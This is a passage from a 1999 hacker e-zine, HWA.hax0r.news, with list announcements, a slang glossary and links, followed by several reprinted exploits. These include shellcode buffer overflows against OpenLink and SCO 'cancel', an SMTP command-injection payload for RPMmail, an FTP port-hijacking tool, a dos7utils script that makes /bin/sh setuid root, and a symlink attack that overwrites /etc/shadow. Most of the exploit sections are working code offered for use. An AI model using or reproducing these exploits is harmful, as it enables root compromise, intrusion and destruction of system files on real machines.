    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occured, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and effeciently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributers.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 

    



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondants/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondants (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Sla5h.............................: Croatia
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       Wyze1.............................: South Africa

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form.Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix               Vortexia      Wyze1
     Pneuma         Raven               Zym0t1c       duro
     Repluzer 
     
     Folks from #hwa.hax0r,news 
               
     Ken Williams/tattooman ex-of PacketStorm,
          
     & Kevin Mitnick                      
     
     kewl sites:
     
     + http://blacksun.box.sk. NEW
     + http://packetstorm.securify.com/ NEW
     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    

    
          
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
      Yeah we have a message board, feel free to use it, remember there are no stupid questions...
      well there are but if you ask something really dumb we'll just laugh at ya, lets give the
      message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
      domain comes back online (soon) meanwhile the beseen board is still up...
      
    
      ==============================================================================
      

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *It would appear that the admins at milmail after one year of good use
      *have decided to blackball my hwa@press.usmc.net address, fuckers. So
      *please send all mail to cruciphux@dok.org.... thanks and sorry for 
      *the problem.
      *
      * 
      *
      * Cruciphux
      */
      printf ("EoF.\n");
      }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
03.0  Exploit for Openlink's web configurator for Linux/glibc2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      /*
       * Exploit for Openlink's web configurator for Linux/glibc2
       *  use: pipe through netcat to openlink web port (8000 default)
       *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
       *  makes www_sv execute /usr/bin/wall if you hit the address right
       *
       * For informational purposes only.  This was written to show that
       *  there's a problem, not for skr1pt k1dd33z --.
       *  don't ask me for help on how to use this to crack systems,
       *  help compiling or anything else.  It will only compile on
       *  an x86 compiler however.
       *
       * Addresses that work for me: 0xbffffb65 (initial run of the broker)
       *                             0xbffffb85 (all consecutive attempts)
       *                             probably tied to process ID www_sv runs as;
       *                             first try PIDs were in triple digits, others
       *                             4 digit PIDs.
       *
       * If this works, generally no more www_sv processes will be run as
       * a side effect.
       *
       *                                                -Tymm
       */
      
      #include <stdio.h>
      #include <unistd.h>
      
      void test() {
      
      __asm__("
      
              jmp    doit
      exploit:
      
              # code basically from Aleph One's smash stacking article, with
              #  minor mods
      
              popl  %esi
              movb  $0xd0, %al            # Get a / character into %al
              xorb  $0xff, %al
              movb  %al, 0x1(%esi)        # drop /s into place
              movb  %al, 0x5(%esi)
              movb  %al, 0x9(%esi)
              xorl  %eax,%eax             # clear %eax
              movb  %eax,0xe(%esi)        # drop a 0 at end of string
              movl  %eax,0x13(%esi)       # drop NULL for environment
              leal  0x13(%esi),%edx       # point %edx to environment
              movl  %esi,0xf(%esi)        # drop pointer to argv
              leal  0xf(%esi),%ecx        # point %ecx to argv
              movl  %esi,%ebx             # point ebx to command - 1
              inc   %ebx                  # fix it to point to the right place
              movb  $0xb,%al              # index to execve syscall
              int   $0x80                 # execute it
              xorl  %ebx,%ebx             #  if exec failed, exit nicely...
              movl  %ebx,%eax
              inc   %eax
              int   $0x80
      doit:
              call exploit
              .string \"..usr.bin.wall.\"
      ");
      
      }
      
      char *shellcode = ((char *)test) + 3;
      
      char code[1000];
      
      int main(int argc, char *argv[])
      {
              int i;
              int left;
              unsigned char where[] = {"\0\0\0\0\0"} ;
              int *here;
              char *dummy;
              long addr;
      
              if (argc > 1)
                      addr = strtoul(argv[1], &dummy, 0);
              else
                      addr = 0xbffffb85;
      
              fprintf(stderr, "Setting address to %8x\n", addr);
      
              *((long *)where) = addr;
      
              strcpy(code, shellcode);
      
              for (i = 0; i < 64; i++) {
                      strcat(code, where);
              }
      
              printf("GET %s\n", code);
              exit(0);
      }
      

     
     @HWA*
     
     
04.0  sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From http://www.hack.co.za/ 
      
      /**
      *** sco_cancel.c yields egid=18(lp)
      *** Tested on SCO 5.0.5+Skunkware98
      *** 
      *** Compile gcc -o sco_cancelx.c sco_cancelx.c 
      ***
      ***  Brock Tellier btellier@usa.net
      ***       
      **/ 
      
      
      #include <stdlib.h>
      #include <stdio.h>
      
      char scoshell[]= /* doble@iname.com */
        "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
        "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
        "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
      
                             
      #define LEN 1500
      #define NOP 0x90
                             
      unsigned long get_sp(void) {
        __asm__("movl %esp, %eax");
      }
      
      
      int main(int argc, char *argv[]) {
      
        long int offset=0;
        int i;
        int buflen = LEN;
        long int addr;
        char buf[LEN];
       
        if(argc > 3) {
          fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
          exit(0); 
        }
        else if (argc == 2){
          offset=atoi(argv[1]);
        }
        else if (argc == 3) {
          offset=atoi(argv[1]);
          buflen=atoi(argv[2]); 
        }
        else {
          offset=600;
          buflen=1200;
        }
      
        addr=get_sp();
        fprintf(stderr, "\nSCO 5.0.5 cancel exploit yields egid=18(lp)\n");
        fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
        fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
      
        memset(buf,NOP,buflen);
        memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
        for(i=((buflen/2) + strlen(scoshell))+1;i<buflen-4;i+=4)
          *(int *)&buf[i]=addr+offset;
      
        execl("/opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel", "cancel", buf, NULL);
        exit(0);
      }
      
      @HWA     

05.0  Smail + RPMmail Exploit
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      Exploit:
      
        Smail + RPMmail
      
        bash-2.03$ telnet (host) 25
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
          MAIL FROM: ;/command/to/execute;
          250 <;/command/to/execute;> ... Sender Okay
          RCPT TO: rpmmail
          250  ... Recipient Okay
          data
          354 Enter mail, end with "." on a line by itself
          .
          250 Mail accepted
          quit
      
        Sendmail 8.9.3 + RPMmail
         
        [nhaniff@dhcp-160-190 nhaniff]$ telnet (host) 25
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
          helo x.x
          250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost 
          [127.0.0.1], pleased to meet you
          MAIL FROM: ;/command/to/execute;@microsoft.com
          250 <;/command/to/execute;@microsoft.com> ... Sender Okay
          RCPT TO: rpmmail
          250  ... Recipient Okay
          data
          354 Enter mail, end with "." on a line by itself
          .
          250 Mail accepted
          quit
      
      
      @HWA     
      
06.0  ftpspy, ftp exploit
      ~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 
            
            /*
              ftpspy.c
              This program is written to show vulnerability of some FTP servers
              then establish passive ftp connection.
              You MAY use this program or any part of it to test your ftp server
              for this vylnerability. You MUST NOT use this program or any part 
              of it against another FTP server. 
      
              The program distributed "AS IS" without any guarantees.
      
              This program uses the fact, that most TCP/IP stacks allocates TCP ports
              for applications one-by-one. Program creates FTP connection to FTPPORT
              of attacked machine, logs in as USER with PASS and then every RETRYDELAY
              seconds sends PASV command to server to find which TCP port is used now
              by server. After port is discovered program bombs next NTHREAD ports 
              starting from found port + OFFSET with "connect" requests.
      
              Vuln: FreeBSD 2.2.1-2.2.5
      
              (c) 1999 3APA3A aka Wise Tomcat
              Please send all your comments to wise@tomcat.ru
                       /\_/\
                      { . . }     |\
              +--oQQo->{ ^ }<-----+ \
              |  3APA3A  U  3APA3A   }
              +-------------o66o--+ /
                                  |/
      */
      
      
      #include <stdio.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <arpa/inet.h>
      #include <unistd.h>     
      #include <setjmp.h>     
      #include <signal.h>
      
      #define DEBUGLEVEL 1
      #define USER "USER ftp\012"
      #define PASS "PASS root@\012"
      #define PASV "PASV\012"
      #define NTHREADS 3
      #define RETRYDELAY 10
      #define FTPPORT 21
      #define OFFSET 1
      #define TIMEOUT 5
      
      int gotit=0;
      char buf[4100];
      long size;
      int port;
      
      
      char * text =  "All my loving I will send to you\r\012All my loving, darling I'll be true\r\012 rw-r--r--  1 1012  5  406 Aug 08 10:08 loving\r\012" ;
      
      void usage( char* progname) {
       fprintf(stderr, "Usage: %s ipaddr", progname);
       exit(1);
      }
      
      void getsignal(int sig){
              if(!gotit){
      
      #if DEBUGLEVEL > 2
                      fprintf(stderr, "Port %d killed\n", port);
      #endif
      
                      exit(0); /* Papa asks me to shutdown! */
              }
      }
      
      
      jmp_buf env;
      
      
      int needalarm=0;
      void br(int sig){
              if(needalarm) longjmp(env,1);
      }
      /* Read FTP SERVER replies while they begins '###-'. Last line looks like '### '. */
      
      void getftpdata(int sock){
       char * newl;
       while( (size = read(sock, buf, 1024)) > 0 ){
      
      #if DEBUGLEVEL > 1
              write(2, "<<", 2);
              write(2, buf, size);
      #endif
              if( size > 0 ) buf[size] = 0;
              for( newl=buf; newl && ((newl-buf) < (size-3)); newl = strchr(newl, '\012') ) if(newl[3] != '-' && isdigit(newl[1]) ) return;
       }
      }
      
      /* write command to FTP SERVER*/
      
      void writeftpdata(int sock, char* data){
              write(sock, data, strlen(data));
      
      #if DEBUGLEVEL > 1
              write(2, ">>", 2);
              write(2, data, strlen(data));
      #endif
      
      }
      
      int main(int argc, char* argv[]){
       struct sockaddr_in sin;
       int ftpsock, sock;
       char addr[16];
       int i;
       int code, a1, a2, a3, a4, p1, p2;
       pid_t children[NTHREADS];
       pid_t child;
       
       if(argc!=2) usage(argv[0]);
       sin.sin_addr.s_addr = inet_addr(argv[1]);
       sin.sin_family = AF_INET;
       sin.sin_port = htons(FTPPORT);
       if ((ftpsock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
               fprintf(stderr, "Error: Unable to allocate socket\n");      
               return -1;                                 
       }
      
       /* connect to FTPPORT of FTP SERVER */
      
       if( connect(ftpsock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){
              fprintf(stderr, "Unable to connect %s:%d\n", argv[1], FTPPORT);
              return -2;
       }
      
       /* now log in as USER with PASS */
      
       getftpdata(ftpsock);
       writeftpdata(ftpsock, USER);
       getftpdata(ftpsock);
       writeftpdata(ftpsock, PASS);
       getftpdata(ftpsock);
      
      #if DEBUGLEVEL > 0
       fprintf(stderr, "Logged on\n");
      #endif
      
      
       for(;;){
      
              /* every RETRYDELAY seconds we send PASV  command to FTP SERVER
                 in order to have fresh inforamation about ports it listens */
      
              writeftpdata(ftpsock, PASV);
              getftpdata(ftpsock);
              sscanf(buf, "%d Entering Passive Mode (%d,%d,%d,%d,%d,%d)", 
                      &code, &a1, &a2, &a3, &a4, &p1, &p2);
              if( code < 200 || code > 300 ){
                      fprintf(stderr, "Unable to enter PASV mode: %d\n", code);
                      return -3;
              }
              sprintf(addr, "%d.%d.%d.%d", a1, a2, a3, a4);
              port = p1 * 256 + p2; /* FTP SERVER allocated this port for us */
      
      #if DEBUGLEVEL > 2
              fprintf(stderr, "Got port %d\n", port);
      #endif
      
              sin.sin_addr.s_addr = inet_addr(addr);
      
      #if DEBUGLEVEL > 2
              fprintf(stderr, "Monitor: %s %d-%d\n", addr, port + 1, port + NTHREADS + OFFSET - 1);
      
              /* We will mpnitor this port range */
      
      #endif
      
              /* now lets fork() with NTHREADS - one thfread for each port that will be bombed */
      
              for( i=0; (i < NTHREADS) && (child = fork()); i++ ) children[i] = child;
              if(child){              /* Lucky PAPA */
      
      #if DEBUGLEVEL > 2
                      fprintf(stderr, "%i threads started\n", i);
      #endif
      
                      /* It's good time to sleep little bit and then to kill
                         all this noisi children */
      
                      sleep(RETRYDELAY);
                      for( i=0; i<NTHREADS; i++ ) kill(children[i], SIGUSR1);
              }
              else {                  /* Happy child */
                      port += OFFSET +i;
      
      #if DEBUGLEVEL > 2
                      fprintf(stderr, "Monitor port %d started\n", port);
      #endif
      
                      signal(SIGUSR1, getsignal);
                      signal(SIGALRM, br);
                      sin.sin_port = htons(port);
                      for(;;){        /* Lets bomb the port! */
                              if( (sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
                                      printf("Error: Unable to allocate socket\n");      
                                      return -1;                                 
                              }
                              if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) != -1 ) break;
                              close(sock);
                      }
                      gotit = 1;      /* We did it!!! */
                      printf("Got it!!!! Port:%d\n", port);
                      if(!setjmp(env)){
                              needalarm=1;
                              alarm(TIMEOUT);
                              while( (size = read(sock, buf, 4096)) > 0 ) {
                                      needalarm = 0;
                                      write (1, buf, size);
                              }
                      }
                      else {
                              writeftpdata(sock, text);
                      }
                      close(sock);
                      return 0;
              }
       }
       return 0;
      }
      
      @HWA      
      
07.0  A vulnerability exists in the /usr/lib/merge/dos7utils program...
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      #!/bin/sh
      #
      #  A vulnerability exists in the /usr/lib/merge/dos7utils
      # program  (suid root  by default)  which allows any user
      # to execute any command as root.
      #
      #  The dos7utils program gets its localeset.sh exec path
      # from the environment variable STATICMERGE.  By setting
      # this to a directory writable by us and setting the -f
      # switch, we can have dos7utils run our program as follows:
      #
      #                                         ..Brock Tellier
      
      uname -a; id; pwd
      export STATICMERGE=/tmp
      
      cat > /tmp/localeset.sh << 'EOF'
      #!/bin/sh
      id
      chmod +s /bin/sh
      EOF
      
      chmod 700 /tmp/localeset.sh 
      ./dos7utils -f bah
      /bin/sh
      
      #                 www.hack.co.za                 #      
      
      @HWA
      
08.0  SCO OpenServer symlink vulnerability (Brock Tellier)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      #!/bin/sh
      #
      # Under certain versions of SCO OpenServer there exists a
      # symlink vulnerability which can be exploited to overwrite
      # any file which is group writable by the 'auth' group.
      #
      # The problem in particular is in the the
      # /etc/sysadm.d/bin/userOsa executable. When given garbage
      # output the program will write out a debug log. However,
      # the program does not check to see if it overwriting a
      # currently existing file nor wether it is following a
      # symlink. Therefore is it possible to overwrite files with
      # debug data which are both in the 'auth' group and are
      # writable by the same group. Both /etc/shadow & /etc/passwd
      # fall into this category. If such an attack were launched
      # against these files the system would be rendered unusable.
      #
      #                                         ..Brock Tellier
      #
      #    vulnerable: SCO Open Server 5.0 -> 5.0.5
      #
      # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
      
      cd /tmp
      ln -s /etc/shadow.old debug.log
      /etc/sysadm.d/bin/userOsa
      
      #                     www.hack.co.za                     #
      
      @HWA
      
09.0  GREX  cyberspace.org - Free shell access
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Free shell (restricted) no telnet/ftp unless you contribute, system is setup
      similar to a bbs but you do get a shell. Telnet to cyberspace.org.
      
      And you get this, heres a brief look see at the system;
      
       
      Grex central timekeeping.  At the beep, the time is
       6:20PM on Tuesday, 19 October 1999
       
      New to grex?  Type help at the login prompt
       
      (ttys3) grex login: ccc
      ccc's Password:
      Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com.
       
            Happy Birthday to Jishnu Nair (atticus's baby)!
       
      Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.x.x.x
      No mail.
      Type 'bbs' to see what Grex is all about!
      Type 'change' to change your settings.
      Type 'faq' to see answers to frequently asked questions.
      > ls -laFF
      total 10
      drwxr-xr-x   2 ccc      populus       512 Oct 19 18:14 ./
      drwxr-xr-x  16 root     wheel         512 Oct 19 18:13 ../
      -rw-r--r--   1 ccc      populus      1159 Oct 19 18:15 .agora31.cf
      -rw-r--r--   1 ccc      populus       778 Oct 19 18:13 .cfonce
      -rw-r--r--   1 ccc      populus       664 Oct 19 18:13 .cshrc
      -rw-r--r--   1 ccc      populus       718 Oct 19 18:13 .login
      -rw-r--r--   1 ccc      populus      1245 Oct 19 18:13 .mailrc
      -rw-------   1 ccc      populus       360 Oct 19 18:13 .plan
      > ps -aux
      USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
      ccc      13349 76.8  0.2  296  528 s3 R    18:21   0:03 ps -aux
      mikeaa   13347 30.8  0.1   36  264 t1 S    18:21   0:00 /usr/local/lib/gcc-lib/s
      root     13353 24.3  0.2  288  460 ?  S    18:21   0:00 sendmail: SAA13353 major
      mikeaa   13341  8.7  0.1   44  252 t1 S    18:21   0:00 /usr/local/bin/gcc.real
      root       152  8.3  0.0   12    8 ?  S    Oct 10521:55 update
      root     13352  3.9  0.1  120  264 t7 S    18:21   0:00 login -h 208.135.167.19
      root      7712  0.6  0.0   56   60 ?  S    17:39   0:05 telnetd ttyq3 207.91.203
      ccc      13228  0.5  0.3  264  732 s3 S    18:20   0:02 -tcsh (tcsh)
      root     13148  0.4  0.2   56  440 ?  S    18:20   0:02 telnetd ttyt7 208.135.16
      root        91  0.0  0.1   60  168 ?  S    Oct 10174:57 syslogd
      root        98  0.0  0.0  240   88 ?  S    Oct 10 32:13 sendmail: accepting conn
      root       112  0.0  0.0  136    0 ?  IW<  Oct 10 46:40 /usr/local/sbin/robocop
